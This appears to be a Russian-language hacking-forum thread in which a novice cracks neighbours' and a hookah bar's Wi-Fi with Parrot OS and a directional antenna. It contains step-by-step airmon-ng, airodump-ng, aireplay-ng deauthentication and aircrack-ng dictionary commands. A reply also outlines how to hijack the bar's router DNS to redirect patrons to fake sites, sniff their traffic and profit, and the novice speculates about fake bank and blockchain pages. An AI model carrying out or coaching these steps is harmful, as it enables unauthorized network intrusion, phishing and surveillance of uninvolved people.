• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Взлом Wi-Fi, неудачи на Parrot OS. В чём проблема?

baskervillyy

Green Team
26.12.2018
12
8
BIT
0
Привет, уважаемые посетители Кодебай.
Вопрос от совсем зеленого и совсем неопытного пользователя.
По просьбе жильцов своего дома, и соседних многоэтажек, решил потестировать ТД на проникновение.
С 50-ти попыток на самых разных ТД, на самых разных приложениях я потерпел неудачу.
Использую Parrot OS на VirtualBox+Alfa AWUS036NH+2.4 gHz Yagi amxy-2400-16.
Нахожу более 100 точек, но сделать так ни с одной ничего не смог. Везде терплю неудачу.
Что я делаю не так, или что ещё нужно сделать, чтобы было "так"?)
photo_2019-01-10_06-36-09.jpg
 
V

Valkiria

Как исправить ошибки при запуске wifite и что не так с отпечатком?

На первой картинке тебя просят:
1. Убить все процессы, которые могут помешать работе программы airmon-ng.
# airmon-ng check kill
или убей все процессы, номера которых указаны
# kill 658 663 664 673 893
2. Установить hcxpcaptool
# apt-get update
# apt-get install hcxpcaptool
Если ты установил эту софтину, то значит установка прошла некорректно.

На второй картинке сообщение о том, что программы pyrit и aircrack-ng посчитали твоё рукопожатие невалидным, а cowpatty не нашла подходящего пароля в твоём словаре. Рукопожатие не расшифровано. Меняй словарь. Но скорее всего, твоё рукопожатие - не валидно.



Как ты сделал себе такой красочный эмулятор терминала ? Редактировал ~/.bashrc ? Где брал содержание этого файла ?
 
Последнее редактирование модератором:
  • Нравится
Реакции: baskervillyy

baskervillyy

Green Team
26.12.2018
12
8
BIT
0
На первой картинке тебя просят:
1. Убить все процессы, которые могут помешать работе программы airmon-ng.
# airmon-ng check kill
или убей все процессы, номера которых указаны
# kill 658 663 664 673 893
2. Установить hcxpcaptool
# apt-get update
# apt-get install hcxpcaptool
Если ты установил эту софтину, то значит установка прошла некорректно.

На второй картинке сообщение о том, что программы pyrit и aircrack-ng посчитали твоё рукопожатие невалидным, а cowpatty не нашла подходящего пароля в твоём словаре. Рукопожатие не расшифровано. Меняй словарь. Но скорее всего, твоё рукопожатие - не валидно.



Как ты сделал себе такой красочный эмулятор терминала ? Редактировал ~/.bashrc ? Где брал содержание этого файла ?
Отлично, спасибо. Первые 2 задачи решены. Осталось изменить, добавить, дополнить словарь. Как это можно сделать?
Терминал у Parrot изначально такой, не грузит глаза
 
V

Valkiria

Терминал у Parrot изначально такой, не грузит глаза
Я знаю точно, что в любом дистрибутиве можно сделать терминал вот таким красочным. У меня было решение. Но - в прошлом )) Вчера установила себе debian и допиливаю. В эмуляторе не могу добиться желаемой картинки ))

Я думаю, что дело у тебя не только в словаре. Твоё рукопожатие - не валидно. Посмотри выше, я заранее предупреждала, что оно заведомо в твоих условиях будет содержать много мусора или будет не валидным. Программа pyrit не только брутит хэндшейк, но и проверяет его на валидность. Она и сообщила тебе о невалидности.

Не работай в области вардрайвинга на автоматах типа аиргеддон, вафайти и подобных. Они - блеф, иллюзия успеха. Если хочешь успеха, то во всём придётся разобраться в ручном режиме.
 
  • Нравится
Реакции: baskervillyy

baskervillyy

Green Team
26.12.2018
12
8
BIT
0
Я знаю точно, что в любом дистрибутиве можно сделать терминал вот таким красочным. У меня было решение. Но - в прошлом )) Вчера установила себе debian и допиливаю. В эмуляторе не могу добиться желаемой картинки ))

Я думаю, что дело у тебя не только в словаре. Твоё рукопожатие - не валидно. Посмотри выше, я заранее предупреждала, что оно заведомо в твоих условиях будет содержать много мусора или будет не валидным. Программа pyrit не только брутит хэндшейк, но и проверяет его на валидность. Она и сообщила тебе о невалидности.

Не работай в области вардрайвинга на автоматах типа аиргеддон, вафайти и подобных. Они - блеф, иллюзия успеха. Если хочешь успеха, то во всём придётся разобраться в ручном режиме.
где можно найти более менее простые понятные мануалы для новичков?
 
V

Valkiria

где можно найти более менее простые для воспрития мануалы для новичков?
Интернет - вот мой мануал. Интернет содержит все знания планеты.
Разве может найтись более объёмный, понятный, разнообразный, многоязычный источник знаний ?
 
  • Нравится
Реакции: baskervillyy

baskervillyy

Green Team
26.12.2018
12
8
BIT
0
Первый успех!!!! Спасибо за помощь, друзья. Кальянная пробита и расшифрована!)

Первый успех!!!! Спасибо за помощь, друзья. Кальянная пробита и расшифрована!)
P.S. владелец кальянной благодарит меня и команду кодебай за выявление уязвимостей, а также обещает устранить их в крачайшие сроки во избежание повторных атак ))
 
  • Нравится
Реакции: Глюк
V

Valkiria

владелец кальянной благодарит меня и команду кодебай за выявление уязвимостей,
Надо было заблаговременно перед атакой :
  • Подготовить ДНС-сервер, который перенаправлял-бы трафик кальянной на твои заранее подготовленные фейки.
  • В настройках роутера подменить ДНС сервер.
  • Проснифить трафик.
  • Узнать об этом хозяине и посетителях его кальянной то, чего они сами о себе не знают.
  • Получить вероятный профит.

Эх, и зачем тебе только эта антенна ? :cool:
 
  • Нравится
Реакции: baskervillyy

baskervillyy

Green Team
26.12.2018
12
8
BIT
0
Надо было заблаговременно перед атакой :
  • Подготовить ДНС-сервер, который перенаправлял-бы трафик кальянной на твои заранее подготовленные фейки.
  • В настройках роутера подменить ДНС сервер.
  • Проснифить трафик.
  • Узнать об этом хозяине и посетителях его кальянной то, чего они сами о себе не знают.
  • Получить вероятный профит.

Эх, и зачем тебе только эта антенна ? :cool:
Если очень хочеться антенну - могу подарить))
Если в роутере подменить днс, то трафф пойдёт через мой сервер? Это, к примеру, заточить фейки блокчейна, банков, платёжек, то пользователи попадут на них? Не совсем понимаю как, но думаю что примерно так.
Про снифф читал в "Будни ламера". Полезно и познавательно. Это следующий этап, до которого я хочу добраться, но пока нужно отточить не автоматический, а ручной взлом ТД.
Узнать о хозяине и посетителях... ты имеешь ввиду проанализировать траффик? В плане посещения сайтов, типа davaypotrahaemsya.com и пр.?
В общем, план действий очень годный, осталось набраться ума.
 
  • Нравится
Реакции: gr1zl1 и Valkiria

explorer_traveler

Green Team
31.10.2017
24
22
BIT
1
baskervillyy: для того, что-бы понять базовые принципы взлома Wi-Fi *(самых распространённых векторов атак) нужно изучить инструменты airmon-ng, airodump-ng, aircrack-ng, aireplay-ng. С ними поймёшь азы. Все вышеперечисленные в ветке инструменты - скрипты для автоматизации работы этой чётвёрки (ну не считая reaver для атаки Pixie Dust и подбора пина для WPS).

Как по мне, лучший начальный инструмент автоматизации атак на Wi-Fi сети - это wifite.

Немного мануала от меня по киту-airmon-ng, airodump-ng, aircrack-ng, aireplay-ng:

Команды в первом терминале:
airmon-ng start wlan0 #интерфейс должен стать на wlan0mon
airodump-ng wlan0mon #выбираешь атакуемую точку доступа (и одного из клиентов на ней, что не обязательно, но желательно)
airodump-ng --bssid 00:00:00:00:00:00 -c 1 --write ./Desktop/ wlan0mon # -с 1 = канал точки доступа из airodump-ng

Команды во втором терминале:
aireplay-ng --deauth 30 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0mon #топим соединение между хабом и клиенитом deauth пакетами (-a = точка доступа, -c один из клиентов на этой точке)

Ожидаем WPA handshake в окне первого терминала ("Waiting for WPA handshake 00:00:00:00:00:00")
Когда handshake словлен открывает третий терминал.

Команды в третьем терминале:
aircrack-ng -w './Desktop/vocabulary_top100.txt' -b 00:00:00:00:00:00 './Desktop/-01.cap' #собственно, сам подбор по словарю (-w = путь к словарю, -b = MAC адрес атакуемой точки доступа)

Смотрим в терминал, завариваем кофе, чувствуем себя начинающим пентестером и ждём сообщения "KEY FOUND! [qwerty]"

Это всё. ,)

P.S.
airmon-ng stop wlan0mon
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!